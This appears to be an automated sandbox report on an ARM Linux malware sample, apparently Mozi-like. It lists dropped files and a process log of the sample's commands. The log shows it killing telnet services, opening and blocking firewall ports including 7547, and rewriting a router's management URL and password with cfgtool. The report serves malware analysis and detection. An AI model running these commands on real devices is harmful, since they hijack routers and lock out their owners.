IOCReport

loading gif

Files

File Path
Type
Category
Malicious
rIbyGX66Op
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
malicious
/etc/init.d/hostname.sh
ASCII text
dropped
malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountall.sh
ASCII text
dropped
malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
malicious
/etc/rc.local
ASCII text
dropped
malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/usr/bin/gettext.sh
ASCII text
dropped
malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
clean
/etc/acpi/undock.sh
ASCII text
dropped
clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
clean
/tmp/.config
ASCII text
dropped
clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
clean
/usr/share/alsa/utils.sh
ASCII text
dropped
clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
clean
/usr/share/os-prober/common.sh
ASCII text
dropped
clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
clean
There are 212 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/rIbyGX66Op
/usr/bin/qemu-arm /tmp/rIbyGX66Op
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
clean
/bin/sh
n/a
clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
clean
/sbin/iptables
n/a
clean
/sbin/modprobe
/sbin/modprobe ip_tables
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --dport 8000 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
clean
/tmp/rIbyGX66Op
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
clean
/sbin/upstart
n/a
clean
